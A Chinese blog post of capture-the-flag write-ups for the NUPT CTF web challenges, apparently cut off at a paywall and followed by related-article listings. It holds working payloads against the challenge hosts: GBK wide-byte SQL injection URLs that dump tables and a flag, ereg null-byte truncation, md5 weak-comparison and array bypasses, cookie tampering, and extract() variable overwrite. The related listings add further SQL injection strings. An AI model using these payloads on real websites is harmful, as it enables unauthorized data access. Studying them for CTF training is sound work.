南邮CTF-WEB-write-up 教程详细解说

最新推荐文章于 2024-05-18 14:05:46 发布
最新推荐文章于 2024-05-18 14:05:46 发布
阅读量3.4k 收藏 12
点赞数 3
分类专栏: Writer-up 文章标签: 南邮  信安 writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhhy7788/article/details/79603295
版权

单身一百年也没用

传送门:biu~

如图所示

单击之后,跟我说没有key
这里写图片描述

这种题目就直接用burpsuit抓包,观察请求回应信息
这里写图片描述
答案很明显了,flag出来了

Download~!

想下啥就下啥~别下音乐,不骗你,试试下载其他东西~
真·奥义·传送:点我
这里写图片描述
点击了那两个音乐链接,发现是正常的音乐文件,审查一下元素,发现了问题这里写图片描述
这里的链接很可能存在文件包含漏洞,可以试试用download.php的base64编码看看能否取出源代码。
这里写图片描述
获得download的源码
审计代码发现这里面有一个include(“hereiskey.php”);我们继续按着前面的思路得到源码
这里写图片描述
flag到手了

COOKIE就是甜饼的意思~
地址:传送门
TIP: 0==not
这题目一进来啥也没有,根据提示,看来是要抓包分析了
这里写图片描述发现了Cookie: Login=0,前面的提示是0==not ,那么1应该就是==yes 咯
这里写图片描述flag到手了!

MYSQL

不能每一题都这么简单嘛
你说是不是?
题目地址
这里写图片描述这题涉及到了每个网站都有的robots.txt,直接在url里面转入robots.txt
这里写图片描述
这里,提示了我们sql.php,进行代码审计吧,审计发现:intval()将变量转成整数类型,且,数值不能是1024,那么就有可能是小数咯
这里写图片描述flag到手

sql injection 3

关于这题,大家可以看看我在简书上写的sqlmap相关该题题解:点我
here
这里写图片描述这里看链接名字就看出来了,GBK宽字节注入啊,宽字节注入需要用到啥?%df之类的(具体的宽字节注入方面的内容这里不赘述了,大家百度一下)
这里写图片描述
这里写图片描述
经过这两个,大家可以看到,order by 2 和显示位为 “2” ,接下来可以顺利进行爆库,查询名为’sae-chinalover’的数据库的表
database

查表
这里写图片描述
这里写图片描述
这里写图片描述
这里写图片描述
相关代码

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df%27%20union%20select%201,table_name%20from%20information_schema.tables%20where%20table_schema=0x7361652D6368696E616C6F766572%20limit%200,1%23
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df%27%20union%20select%201,table_name%20from%20information_schema.tables%20where%20table_schema=0x7361652D6368696E616C6F766572%20limit%201,1%23
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df%27%20union%20select%201,table_name%20from%20information_schema.tables%20where%20table_schema=0x7361652D6368696E616C6F766572%20limit%202,1%23
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df%27%20union%20select%201,table_name%20from%20information_schema.tables%20where%20table_schema=0x7361652D6368696E616C6F766572%20limit%203,1%23

经一步步查询,得到flag在ctf4中

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df%27%20union%20select%201,column_name%20from%20information_schema.columns%20where%20table_name=0x63746634%20limit%200,1%23
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df%27%20union%20select%201,column_name%20from%20information_schema.columns%20where%20table_name=0x63746634%20limit%201,1%23

flag

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df%27%20union%20select%201,flag%20from%20ctf4%23

这里写图片描述

/x00

题目地址:题目有多种解法,你能想出来几种?
这里写图片描述这题目要求我们输入一个nctf的参数值,且这个参数值必须为 1. 数字 2. #biubiubiu 就是让我们绕过判断语句

ereg的漏洞: 会被%00截断及遇到%00则默认为字符串的结束
所以我们可以构造绕过语句:nctf=1%00%23biubiubiu
这里写图片描述

http://teamxlc.sinaapp.com/web4/f5a14f5e6e3453b78cd73899bad98d53/index.php?nctf=1%00%23biubiubiu

bypass again

地址:依旧是弱类型
这里写图片描述通过审计代码,发现他让你既要a!=b 又要 md5的a b值相等。
这里写图片描述

这里写图片描述

  1. 240610708跟QNKCDZO 利用不同的字符串可能产生相同的md5 绕过
  2. a[]=1&b[]=2 利用php get 可以数组,而md5() 不能处理数组

变量覆盖

听说过变量覆盖么?
地址: 题目地址
打开页面后发现有个源代码“source at /source.php” 点击进去是让我们代码审计与变量覆盖有关:经查询,变量覆盖与代码中的extract()有关,这里放出一个链接,与变量覆盖的相关知识有关,大家可以看看:点我
这里是 extract($_POST);提交参数 我们可以抓包修改
这里写图片描述
payload:pass=1&thepassword_123=1

PHP是世界上最好的语言

听说PHP是世界上最好的语言
地址:题目地址
这里写图片描述
tips我们还有一个index.txt文件
这里写图片描述
代码审计了,要绕过if(eregi(“hackerDJ”, GET[id]))
并确保经过urldecode( G

最低0.47元/天 解锁文章
zhhy7788
关注
  • 3
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf up怎么 write_CTF从入门到成仙,40道bugku Write Up,看完还有什么操作搞不定!...
weixin_39785165的博客
01-14 434
CTF从入门到成仙,40道bugku Write Up,看完还有什么操作搞不定!本文原创作者:Passerby2,本文属i春秋原创奖励计划,未经许可禁止转载!前言之前刷过的bugku,这次把之前的解题思路过程都总结到一起了,差不多有40道吧应该算比较全了。题目说:访问参数为:?id=x不允许包含“--”,空格,单引号,双引号,“union”关键字,查询文件中包含“”(双引号)里面的内容,需要查询的...
南京邮电大学网络攻防训练平台writeup
weixin_34406086的博客
01-06 3779
本文带目录版本:https://findneo.github.io/170924NuptCTFWP/ 南邮CTF平台网址: http://ctf.nuptsast.com/challenges http://ctf.nuptzj.cn/challenges WEB 签到题 nctf{flag_admiaanaaaaaaaaaaa} ctrl+u或右键查看源代码即可。在CTF比赛中,代码...
SQLi-LABS Page-1(Basic Challenges)1-22关
最新发布
2301_77887106的博客
05-18 1482
3.使用1' and if(ascii(substr((select column_name from information_schema.columns where table_schema="指定数据库名字" and table_name="指定数据库表" limit 0,1),1,1))=55,sleep(2),0)--+来对数据库的首个字母所属的ascii值正逐个爆破,直到触发睡眠为止。id=1'+and+left(database(),2)='s§a§'--+,继续爆破,可以看到第二位为e。
BUUCTF笔记之Web系列部分WriteUp(一)
克格莫
04-29 916
1、[极客大挑战 2019]EasySQL
网络安全实验室CTF—基础关 writeup
Senimo
08-02 4072
网络安全实验室CTF—基础关 writeupkey在哪里?再加密一次你就得到key啦~猜猜这是经过了多少次加密?据说MD5加密很安全,真的是么?种族歧视HAHA浏览器key究竟在哪里?key又找不到了冒充登陆用户比较数字大小本地的诱惑就不让你访问 网络安全实验室CTF链接 key在哪里? 再加密一次你就得到key啦~ 猜猜这是经过了多少次加密? 据说MD5加密很安全,真的是么? 种族歧视 HAHA...
CTF入门篇writeup——D0g3 Games
weixin_34029680的博客
10-31 706
今天在网上找到一个CTF的小游戏,题目我做了几道感觉挺简单,很适合入门,之前了解CTF,参加各种杯或者是看各种比赛题的writeup,感觉太难了,想到这我还是决定从点滴做起,记录一下学习过程,同时也想做一套CTF从入门到精通的教程。 网址:http://ctf.d0g3.cn/ image.png ...
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
CTF-Write-up:CTF和信息
03-21
CTF-Write-up-main这个压缩包中,可能包含了多个CTF Write-up文档,每个文档都详细记录了一个或多个挑战的解题过程。这些文档可以作为学习资料,帮助初学者了解不同类型的CTF挑战,熟悉解题流程,并且学习如何分析...
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
在这个"CTF-Web-Challenge"中,你将有机会学习和实践如何在Web环境中识别和利用漏洞。 PHP是一种广泛使用的服务器端脚本语言,特别适合开发动态网站。在CTF挑战中,你可能会遇到的PHP相关知识点包括: 1. **PHP...
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
内容概要: CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息... 使用场景: ... 其他说明: ...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF平台题库writeup(一)--南邮CTF-WEB(部分)
渗透、攻防、CTF、编程
06-25 1万+
WEB题 1.签到题 题目:key在哪里? writeup:查看源代码即可获得flag! 2.md5 collision 题目: <?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' && $md51 == $md52) { echo "nctf{*****************}"; } else {
百度杯CTF Write up集锦 WEB
热门推荐
4ct10n
09-21 4万+
九月场1.code一开始的URL为http://ace3c302efed4a9094cbac1dff0250e8add1b4b45f8249d4.game.ichunqiu.com/index.php?jpg=hei.jpg尝试着令jpg=index.php得出了base64编码的文本 丢到解码器里解出文本index.php<?php /** * Created by PhpStorm. *
ctf up怎么 write_Hgame Ctf write up (3&4)
weixin_42565652的博客
01-14 584
本帖最后由 yechen123 于 2019-3-9 21:06 编辑这是第三周和第四周的逆向题好像没有师傅wp恰巧第一次碰到webassembly 想记录一下题目.rar(135.21 KB, 下载次数: 31)2019-3-6 22:35 上传点击文件名下载附件下载积分: 吾爱币 -1 CB第三周0x00 easy_math[Asm] 纯文本查看 复制代码int __cdecl main(i...
bugku web 13 writeup
weixin_50597969的博客
12-04 181
bugku web4题目信息解题思路FLAG 题目信息 解题思路 先随便输一个 貌似和web5比较像 F12查看源代码 其实先查看源代码最好 关键代码如下: var p1 = '%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%53%75%62%6d%69%74%28%29%7b%76%61%72%20%61%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%.
WhaleCTF Web部分writeup
MozhuCY的博客
02-04 3658
Web部分writeup(真的是部分wp 二进制小白兼web盲来记录下今天做的几道题。。。 0x00 签到题直接f12查看源码即可 0x01 http呀 这里提供两种思路 做web肯定少不了burpsuit啦,网页中给了提示,Do you know what happend just now?! ( •̀∀•́ )突然想起南邮CTF平台上的两道题,考虑是不是flag在
Bugkuctf web writeup
k0sec的安全路
03-18 369
web2 writeup 访问http://123.206.87.240:8002/web2/ 一堆滑稽。。。 页面没有任何提示,查看一下源代码。点击鼠标右键,发现没有查看源码选项,正常情况下应该有。 猜测flag很可能在源代码中。 按F12: 很显然,flag KEY{Web-2-bugKssNNikls9100} 总结,查看源代码的几种方法: (1)F12 (2)Ctrl+U (3)在u...
南邮ctf平台部分题解
xuqi7
06-11 2万+
南邮ctf平台部分wp
mysql注入ctf_【CTF-Web Learning 1】0x01 SQL注入之宽字节注入
weixin_39776817的博客
01-28 146
0x01 前言准备系统梳理和总结提高这一年所学的关于Web方面东西,如有问题欢迎指点。在计算机中,字符的表示与存储都离不开编码。例如ASCII,utf-8,gbk2312等。通常字符的表示都只需1字节。但也有如gbk2312这种需要2字节来表示的编码格式,这种我们称之为宽字节。所谓宽字节注入,可能存在于以gbk编码存储数据的sql数据库中。在实际站点中已经比较少见(常见于学校远古破站),而且修复方...
ctf-qsnctf此地无银三百
02-20
ctf-qsnctf是一个CTF(Capture The Flag)比赛平台,它提供了一系列的网络安全挑战,旨在帮助参与者提升网络安全技能和解决问题的能力。在ctf-qsnctf平台上,参与者可以通过解决各种类型的题目来获取旗帜(flag),并提交给平台进行验证。 "此地无银三百"是ctf-qsnctf平台上的一道题目,它的名称可能是一个提示,暗示着解题的思路。具体的解题方法和答案我无法透露,因为这会破坏比赛的公平性和乐趣。如果你对这道题目感兴趣,我建议你在ctf-qsnctf平台上注册账号并参与比赛,通过自己的努力和思考来解决问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值